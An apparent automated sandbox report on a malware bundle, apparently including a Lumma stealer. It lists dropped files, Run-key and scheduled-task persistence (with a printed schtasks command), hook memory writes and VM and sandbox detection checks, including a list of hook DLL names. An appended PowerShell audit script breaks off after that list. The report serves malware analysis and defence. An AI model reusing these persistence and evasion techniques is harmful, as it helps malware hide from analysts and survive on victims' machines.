Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe File created: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-FREGM.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-8REGQ.tmp
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libmp3lame.dll (copy)
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe File created: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-V4HAL.tmp
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe File created: C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-HPQQQ.tmp
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Space1.9_big[1].exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\timeSync[1].exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp120.dll (copy)
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\7725eaa6592c80f8124e769b4e8a07f7[1].exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5Xml.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp140.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-OFQC1.tmp
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe File created: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-5QCAU.tmp
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fiona[1].exe
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_RegDLL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-7LPN0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-T59CT.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\openh264.dll (copy)
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe File created: C:\Users\user\AppData\Local\AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV202.exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\QtAVWidgets1.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcr120.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-OPKFD.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-ETDPI.tmp
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2804[1].exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5OpenGL.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5WinExtras.dll (copy)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlx[1].dll
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cad54ba5b01423b1af8ec10ab5719d97[1].exe
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe File created: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libcurl.dll (copy)
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe File created: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp140_1.dll (copy)
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\060[1].exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5Svg.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-0CK56.tmp
Source: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe File created: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe File created: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\setup[1].exe
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma2804[1].exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libeay32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\mousehelper.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\avdevice-58.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-1CATB.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-G7OJ6.tmp
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe File created: C:\Users\user\AppData\Local\Temp\heidiLgVUNbWj4Aw0\6JeTTVCBi2pYO9g7t24p.exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-PT3AE.tmp
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Retailer_prog[1].exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\123p[1].exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-HBU3P.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe

Boot Survival

Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV5
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBGPQMHF"

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Memory written: PID: 7700 base: 2C50005 value: E9 2B BA 27 74
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Memory written: PID: 7700 base: 76ECBA30 value: E9 DA 45 D8 8B
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Memory written: PID: 7700 base: 2C60008 value: E9 8B 8E 2B 74
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Memory written: PID: 7700 base: 76F18E90 value: E9 80 71 D4 8B
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Memory written: PID: 7700 base: 2C80005 value: E9 8B 4D F7 72
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Memory written: PID: 7700 base: 75BF4D90 value: E9 7A B2 08 8D
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Memory written: PID: 7700 base: 2C90005 value: E9 EB EB F7 72
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Memory written: PID: 7700 base: 75C0EBF0 value: E9 1A 14 08 8D
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Memory written: PID: 7700 base: 2CA0005 value: E9 8B 8A 33 72
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Memory written: PID: 7700 base: 74FD8A90 value: E9 7A 75 CC 8D
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Memory written: PID: 7700 base: 2CB0005 value: E9 2B 02 35 72
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Memory written: PID: 7700 base: 75000230 value: E9 DA FD CA 8D
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Memory written: PID: 7776 base: 1170005 value: E9 2B BA D5 75
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Memory written: PID: 7776 base: 76ECBA30 value: E9 DA 45 2A 8A
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Memory written: PID: 7776 base: 11D0008 value: E9 8B 8E D4 75
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Memory written: PID: 7776 base: 76F18E90 value: E9 80 71 2B 8A
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Memory written: PID: 7776 base: 11F0005 value: E9 8B 4D A0 74
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Memory written: PID: 7776 base: 75BF4D90 value: E9 7A B2 5F 8B
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Memory written: PID: 7776 base: 1200005 value: E9 EB EB A0 74
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Memory written: PID: 7776 base: 75C0EBF0 value: E9 1A 14 5F 8B
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Memory written: PID: 7776 base: 1210005 value: E9 8B 8A DC 73
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Memory written: PID: 7776 base: 74FD8A90 value: E9 7A 75 23 8C
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Memory written: PID: 7776 base: 2D90005 value: E9 2B 02 27 72
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Memory written: PID: 7776 base: 75000230 value: E9 DA FD D8 8D
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Memory written: PID: 7792 base: 1990005 value: E9 8B 2F 57 75
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Memory written: PID: 7792 base: 76F02F90 value: E9 7A D0 A8 8A
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Memory written: PID: 7808 base: 7FFE22370008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Memory written: PID: 7808 base: 7FFE2220D9F0 value: E9 20 26 16 00
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Memory written: PID: 7824 base: 12E0005 value: E9 2B BA BE 75
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Memory written: PID: 7824 base: 76ECBA30 value: E9 DA 45 41 8A
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Memory written: PID: 7824 base: 12F0008 value: E9 8B 8E C2 75
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Memory written: PID: 7824 base: 76F18E90 value: E9 80 71 3D 8A
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Memory written: PID: 7824 base: 1310005 value: E9 8B 4D 8E 74
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Memory written: PID: 7824 base: 75BF4D90 value: E9 7A B2 71 8B
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Memory written: PID: 7824 base: 1320005 value: E9 EB EB 8E 74
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Memory written: PID: 7824 base: 75C0EBF0 value: E9 1A 14 71 8B
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Memory written: PID: 7824 base: 1330005 value: E9 8B 8A CA 73
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Memory written: PID: 7824 base: 74FD8A90 value: E9 7A 75 35 8C
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Memory written: PID: 7824 base: 1450005 value: E9 2B 02 BB 73
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Memory written: PID: 7824 base: 75000230 value: E9 DA FD 44 8C
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00481A30 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 7_2_00481A30
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (7 identical entries)
Source: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: pRIMqfuwRZ49ldgjUZ_z2py6.exe PID: 7712, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 8000, type: MEMORYSTR
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Sandbox detection routine: GetCursorPos, DecisionNode, Sleep
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\WlCIinu0yp.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: ifM1E2HUtOYe96efnF4a_sDH.exe, 00000011.00000002.3124005026.0000000000C1A000.00000020.00000001.01000000.00000010.sdmp Binary or memory string: R.SBIEDLL.DLL>3
Source: ifM1E2HUtOYe96efnF4a_sDH.exe, 00000011.00000002.3124005026.0000000000C1A000.00000020.00000001.01000000.00000010.sdmp Binary or memory string: R.SBIEDLL.DLL
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Memory allocated: 16F0000 memory reserve | memory write watch
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Memory allocated: 3500000 memory reserve | memory write watch
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Memory allocated: 3250000 memory reserve | memory write watch
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Memory allocated: 1C57B8A0000 memory reserve | memory write watch (2 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: F60000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2B70000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2910000 memory reserve | memory write watch
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: GetCursorPos,GetCursorPos,GetCursorPos,Sleep,GetCursorPos,Sleep,GetCursorPos, 7_2_0045D9F0
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Thread delayed: delay time: 300000 (2 identical entries)
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Window / User API: threadDelayed 588
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Window / User API: threadDelayed 9258
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
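The entries above show exactly which environment artifacts this sample set reads before deciding to run: the HKLM\HARDWARE\ACPI\DSDT\VBOX__ key, the SystemBiosVersion and VideoBiosVersion values, the display-class DriverDesc, the Win32_DiskDrive, Win32_VideoController and Win32_Processor WMI classes, the firmware table behind the FirmwareTableInformation query, the hook-DLL list found in RegAsm.exe memory (SbieDll.dll, snxhk.dll, vmcheck.dll, ...), and a cursor that never moves between GetCursorPos calls. The following PowerShell script is an added example, not part of this report or of the samples: it audits an analysis VM for those same artifacts so the operator can see what a stealer built like this would find. The function names, the vendor-marker list and the 80 GB disk and single-core thresholds are this example's own assumptions; the report does not show the samples' exact string lists or limits.

```powershell
# Added example (not from the report or the samples): audit an analysis VM for the
# artifacts the processes in this section probe. Marker list and thresholds are
# this example's own assumptions, not values recovered from the samples.

# Hook/sandbox DLL names, taken verbatim from the RegAsm.exe memory string above.
$SandboxDlls = @('avghookx.dll','avghooka.dll','snxhk.dll','sbiedll.dll','api_log.dll',
                 'dir_watch.dll','pstorec.dll','vmcheck.dll','wpespy.dll','cmdvrt32.dll','cmdvrt64.dll')
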